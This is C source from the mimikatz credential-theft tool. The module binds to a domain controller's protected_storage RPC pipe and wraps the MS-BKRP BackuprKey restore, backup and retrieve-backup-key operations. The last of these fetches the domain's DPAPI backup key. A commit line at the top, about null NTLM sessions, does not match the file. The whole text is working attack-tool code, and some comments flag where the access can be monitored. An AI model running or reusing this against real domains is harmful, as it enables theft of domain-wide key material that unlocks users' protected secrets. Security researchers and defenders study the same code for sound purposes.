1722002956
[new] rpc::connect support /null NTLM session for protseq ncacn_ip_tcp
/* Benjamin DELPY `gentilkiwi`
   http://blog.gentilkiwi.com
   benjamin@gentilkiwi.com
   Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_bkrp.h"
/*
 * Open an RPC binding to the ProtectedStorage (BackupKey, MS-BKRP) endpoint
 * of a domain controller over the \pipe\protected_storage named pipe.
 *
 * NetworkAddr  DC to bind to. When NULL, a writable DC for the current domain
 *              is looked up with kull_m_net_getDC and used instead.
 * hBinding     receives the binding handle on success; release it with
 *              kull_m_rpc_deleteBinding.
 *
 * Returns TRUE when the binding was created, FALSE when no DC could be
 * determined or kull_m_rpc_createBinding failed.
 *
 * The binding is authenticated (Kerberos on builds targeting NT < 6.0,
 * SPNEGO otherwise) at impersonation level, so the connection carries the
 * caller's identity to the DC; DC-side logon / named-pipe auditing is the
 * natural place to observe this kind of access.
 */
BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding)
{
	LPWSTR dcName = NULL;
	BOOL bound = FALSE;

	if(NetworkAddr == NULL)
	{
		/* No explicit target: fall back to a writable DC of the current domain. */
		if(kull_m_net_getDC(NULL, DS_WRITABLE_REQUIRED, &dcName))
		{
			NetworkAddr = dcName;
		}
	}

	if(NetworkAddr != NULL)
	{
		/* Authentication package is chosen at build time from the NT major version. */
		bound = kull_m_rpc_createBinding(NULL, L"ncacn_np", NetworkAddr, L"\\pipe\\protected_storage", L"ProtectedStorage", TRUE, (MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, RPC_C_IMP_LEVEL_IMPERSONATE, hBinding, NULL);
	}

	/* dcName is only set by kull_m_net_getDC and is owned here. */
	if(dcName != NULL)
	{
		LocalFree(dcName);
	}
	return bound;
}
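/*
 * Perform one BackuprKey (MS-BKRP) call against a domain controller and hand
 * the server's reply back to the caller in a LocalAlloc'd buffer.
 *
 * NetworkAddr  DC to contact, or NULL to auto-select a writable DC
 *              (see kull_m_rpc_bkrp_createBinding).
 * pGuid        operation GUID passed to BackuprKey (restore, backup, or
 *              retrieve-backup-key; see the wrappers below).
 * DataIn       input blob for the operation, dwDataIn bytes long.
 * pDataOut     receives a copy of the server's reply, allocated with
 *              LocalAlloc(LPTR); the caller owns it and frees it with
 *              LocalFree. NULL on failure.
 * pdwDataOut   receives the reply length in bytes; 0 on failure.
 *
 * Returns TRUE only when the RPC call succeeded AND the reply was copied
 * into a caller-owned buffer. Previously an allocation failure still
 * returned TRUE with *pDataOut == NULL and a non-zero *pdwDataOut, which
 * callers could not distinguish from success; the outputs are now always
 * (NULL, 0) on any failure path.
 *
 * Errors from the server and RPC exceptions are reported with PRINT_ERROR.
 */
BOOL kull_m_rpc_bkrp_generic(LPCWSTR NetworkAddr, const GUID * pGuid, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
	BOOL status = FALSE;
	RPC_BINDING_HANDLE hBinding;
	NET_API_STATUS netStatus;
	PBYTE out = NULL;

	/* Establish the (NULL, 0) contract up front so every early exit honours it. */
	*pDataOut = NULL;
	*pdwDataOut = 0;

	if(kull_m_rpc_bkrp_createBinding(NetworkAddr, &hBinding))
	{
		RpcTryExcept
		{
			/* The stub allocates 'out' with MIDL_user_allocate; it is released below. */
			netStatus = BackuprKey(hBinding, (GUID *) pGuid, (PBYTE) DataIn, dwDataIn, &out, pdwDataOut, 0);
			if(netStatus == 0)
			{
				/* Copy into a LocalAlloc buffer so the caller frees with LocalFree,
				 * independent of the RPC allocator. */
				*pDataOut = LocalAlloc(LPTR, *pdwDataOut);
				if(*pDataOut)
				{
					RtlCopyMemory(*pDataOut, out, *pdwDataOut);
					status = TRUE;
				}
				else
				{
					/* Allocation failed: report it and keep the outputs consistent. */
					PRINT_ERROR(L"LocalAlloc: %u\n", GetLastError());
					*pdwDataOut = 0;
				}
				MIDL_user_free(out);
			}
			else
			{
				PRINT_ERROR(L"BackuprKey: 0x%08x (%u)\n", netStatus, netStatus);
				/* The stub may have written a length even though the call failed. */
				*pdwDataOut = 0;
			}
		}
		RpcExcept(RPC_EXCEPTION)
			PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
		RpcEndExcept
		kull_m_rpc_deleteBinding(&hBinding);
	}
	return status;
}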
/*
 * BackuprKey "restore" operation: sends DataIn (dwDataIn bytes) to the DC
 * under BACKUPKEY_RESTORE_GUID and returns the reply via pDataOut/pdwDataOut.
 * See kull_m_rpc_bkrp_generic for the output-buffer ownership contract.
 */
BOOL kull_m_rpc_bkrp_Restore(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
	const GUID *pOperation = &BACKUPKEY_RESTORE_GUID;
	return kull_m_rpc_bkrp_generic(NetworkAddr, pOperation, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
/*
 * BackuprKey "backup" operation: sends DataIn (dwDataIn bytes) to the DC
 * under BACKUPKEY_BACKUP_GUID and returns the reply via pDataOut/pdwDataOut.
 * See kull_m_rpc_bkrp_generic for the output-buffer ownership contract.
 */
BOOL kull_m_rpc_bkrp_Backup(LPCWSTR NetworkAddr, PVOID DataIn, DWORD dwDataIn, PVOID *pDataOut, DWORD *pdwDataOut)
{
	const GUID *pOperation = &BACKUPKEY_BACKUP_GUID;
	return kull_m_rpc_bkrp_generic(NetworkAddr, pOperation, DataIn, dwDataIn, pDataOut, pdwDataOut);
}
/*
 * BackuprKey "retrieve backup key" operation under
 * BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID; the reply is returned via
 * pDataOut/pdwDataOut (see kull_m_rpc_bkrp_generic for ownership).
 *
 * The input length is 0; the one-byte local only supplies a non-NULL
 * pointer for the call — presumably the stub rejects a NULL buffer, confirm
 * against the IDL. This operation asks the DC for domain-wide key material,
 * so it is a high-value action from a monitoring standpoint.
 */
BOOL kull_m_rpc_bkrp_BackupKey(LPCWSTR NetworkAddr, PVOID *pDataOut, DWORD *pdwDataOut)
{
	BYTE placeholder = 'k';
	const GUID *pOperation = &BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID;
	BOOL result;

	result = kull_m_rpc_bkrp_generic(NetworkAddr, pOperation, &placeholder, 0, pDataOut, pdwDataOut);
	return result;
}